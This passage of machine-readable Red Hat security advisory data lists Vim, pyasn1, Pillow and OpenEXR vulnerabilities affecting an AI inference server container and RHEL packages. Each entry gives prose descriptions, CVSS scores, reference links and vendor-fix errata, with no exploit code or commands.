"text": "The risk posed by this vulnerability is limited on Red Hat products due to user and system isolation features which are enabled by default. The impacts of this flaw will be limited by the active user\u0027s permissions and access control limits. Host systems are not at risk when following Red Hat guidelines and the root user account is not actively executing Vim.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-28417"
},
{
"category": "external",
"summary": "RHBZ#2443455",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443455"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-28417",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28417"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28417",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28417"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/commit/79348dbbc09332130f4c860",
"url": "https://github.com/vim/vim/commit/79348dbbc09332130f4c860"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/releases/tag/v9.2.0073",
"url": "https://github.com/vim/vim/releases/tag/v9.2.0073"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/security/advisories/GHSA-m3xh-9434-g336",
"url": "https://github.com/vim/vim/security/advisories/GHSA-m3xh-9434-g336"
}
],
"release_date": "2026-02-27T21:54:35.196000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:14:38+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16009",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "vim: Vim: Arbitrary code execution via OS command injection in the netrw plugin"
},
{
"cve": "CVE-2026-28421",
"cwe": {
"id": "CWE-120",
"name": "Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)"
},
"discovery_date": "2026-02-27T23:01:44.673504+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2443474"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Vim. This vulnerability, a heap-buffer-overflow and a segmentation fault, exists in the swap file recovery logic. A local attacker could exploit this by providing a specially crafted swap file. This could lead to a denial of service (DoS) or potentially information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vim: Vim: Denial of service and information disclosure via crafted swap file",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The risk posed by this vulnerability is limited on Red Hat products due to user and system isolation features which are enabled by default. The impacts of this flaw will be limited by the active user\u0027s permissions and access control limits. Host systems are not at risk when following Red Hat guidelines and the root user account is not actively executing Vim.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-28421"
},
{
"category": "external",
"summary": "RHBZ#2443474",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443474"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-28421",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28421"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28421",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28421"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/commit/65c1a143c331c886dc28",
"url": "https://github.com/vim/vim/commit/65c1a143c331c886dc28"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/releases/tag/v9.2.0077",
"url": "https://github.com/vim/vim/releases/tag/v9.2.0077"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/security/advisories/GHSA-r2gw-2x48-jj5p",
"url": "https://github.com/vim/vim/security/advisories/GHSA-r2gw-2x48-jj5p"
}
],
"release_date": "2026-02-27T22:06:34.312000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:14:38+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16009",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "vim: Vim: Denial of service and information disclosure via crafted swap file"
},
{
"cve": "CVE-2026-30922",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2026-03-18T04:02:45.401296+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2448553"
}
],
"notes": [
{
"category": "description",
"text": "An unbounded recursion flaw has been discovered in the pypi pyasn1 library. This uncontrolled recursion occurs when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested SEQUENCE (0x30) or SET (0x31) tags with Indefinite Length (0x80) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a RecursionError or consumes all available memory (OOM), crashing the host application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pyasn1: pyasn1 Vulnerable to Denial of Service via Unbounded Recursion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
"summary": "RHBZ#2448553",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448553"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-30922",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-30922"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-30922",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30922"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0",
"url": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r",
"url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r"
}
],
"release_date": "2026-03-18T02:29:45.857000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:14:38+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16009",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pyasn1: pyasn1 Vulnerable to Denial of Service via Unbounded Recursion"
},
{
"cve": "CVE-2026-33412",
"cwe": {
"id": "CWE-78",
"name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
},
"discovery_date": "2026-03-24T20:02:21.511965+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2450907"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Vim. By including a newline character in a pattern passed to Vim\u0027s glob() function, an attacker may be able to execute arbitrary shell commands. This command injection vulnerability allows for arbitrary code execution, depending on the user\u0027s shell settings.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vim: Vim: Arbitrary code execution via command injection in glob() function",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33412"
},
{
"category": "external",
"summary": "RHBZ#2450907",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450907"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33412",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33412"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33412",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33412"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/commit/645ed6597d1ea896c712cd7ddbb6edee79577e9a",
"url": "https://github.com/vim/vim/commit/645ed6597d1ea896c712cd7ddbb6edee79577e9a"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/releases/tag/v9.2.0202",
"url": "https://github.com/vim/vim/releases/tag/v9.2.0202"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/security/advisories/GHSA-w5jw-f54h-x46c",
"url": "https://github.com/vim/vim/security/advisories/GHSA-w5jw-f54h-x46c"
}
],
"release_date": "2026-03-24T19:43:07.219000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:14:38+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16009",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "vim: Vim: Arbitrary code execution via command injection in glob() function"
},
{
"cve": "CVE-2026-40192",
"cwe": {
"id": "CWE-409",
"name": "Improper Handling of Highly Compressed Data (Data Amplification)"
},
"discovery_date": "2026-04-16T00:00:49.590876+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2458856"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to trigger a denial of service (DoS) by providing a specially crafted FITS image file. The library\u0027s failure to limit the amount of GZIP-compressed data during decoding can lead to unbounded memory consumption, causing the system to crash or experience severe performance issues.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Denial of Service via decompression bomb in FITS image processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-40192"
},
{
"category": "external",
"summary": "RHBZ#2458856",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458856"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-40192",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40192"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40192",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40192"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/3cb854e8b2bab43f40e342e665f9340d861aa628",
"url": "https://github.com/python-pillow/Pillow/commit/3cb854e8b2bab43f40e342e665f9340d861aa628"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9521",
"url": "https://github.com/python-pillow/Pillow/pull/9521"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-whj4-6x5x-4v2j",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-whj4-6x5x-4v2j"
},
{
"category": "external",
"summary": "https://pillow.readthedocs.io/en/stable/releasenotes/12.2.0.html#prevent-fits-decompression-bomb",
"url": "https://pillow.readthedocs.io/en/stable/releasenotes/12.2.0.html#prevent-fits-decompression-bomb"
}
],
"release_date": "2026-04-15T22:53:56.147000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:14:38+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16009",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Pillow: Pillow: Denial of Service via decompression bomb in FITS image processing"
},
{
"cve": "CVE-2026-42309",
"cwe": {
"id": "CWE-131",
"name": "Incorrect Calculation of Buffer Size"
},
"discovery_date": "2026-05-09T06:01:11.401932+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2468458"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. A malicious actor could exploit this vulnerability by providing specially crafted nested lists as coordinates to image processing APIs within Pillow. This could lead to a heap buffer overflow, potentially causing a denial of service in applications using the library.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Denial of Service via specially crafted coordinate input",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Moderate impact vulnerability in the Pillow Python imaging library could lead to a denial of service. Applications processing untrusted image data that utilize specific Pillow APIs, such as `ImagePath.Path`, `ImageDraw.ImageDraw.polygon`, or `ImageDraw.ImageDraw.line`, with specially crafted nested list coordinates are susceptible to a heap buffer overflow.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42309"
},
{
"category": "external",
"summary": "RHBZ#2468458",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2468458"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42309",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42309"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42309",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42309"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.2.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.2.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-5xmw-vc9v-4wf2",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-5xmw-vc9v-4wf2"
}
],
"release_date": "2026-05-09T04:08:10.517000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:14:38+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16009",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "Pillow: Pillow: Denial of Service via specially crafted coordinate input"
},
{
"cve": "CVE-2026-42310",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2026-05-09T06:01:21.465052+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2468461"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. A remote attacker could supply a specially crafted malicious PDF file, causing the application to hang indefinitely and consume 100% CPU. This vulnerability leads to a Denial of Service (DoS), making the application unresponsive.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Denial of Service via malicious PDF processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42310"
},
{
"category": "external",
"summary": "RHBZ#2468461",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2468461"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42310",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42310"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42310",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42310"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/3bf614e4b8615d0ce1d5039efaf6db447fe7c468",
"url": "https://github.com/python-pillow/Pillow/commit/3bf614e4b8615d0ce1d5039efaf6db447fe7c468"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9519",
"url": "https://github.com/python-pillow/Pillow/pull/9519"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.2.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.2.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-r73j-pqj5-w3x7",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-r73j-pqj5-w3x7"
}
],
"release_date": "2026-05-09T04:10:48.395000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:14:38+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16009",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 4.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "Pillow: Pillow: Denial of Service via malicious PDF processing"
}
]
}
RHSA-2026:8870
Vulnerability from csaf_redhat - Published: 2026-04-20 03:19 - Updated: 2026-05-14 22:36A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
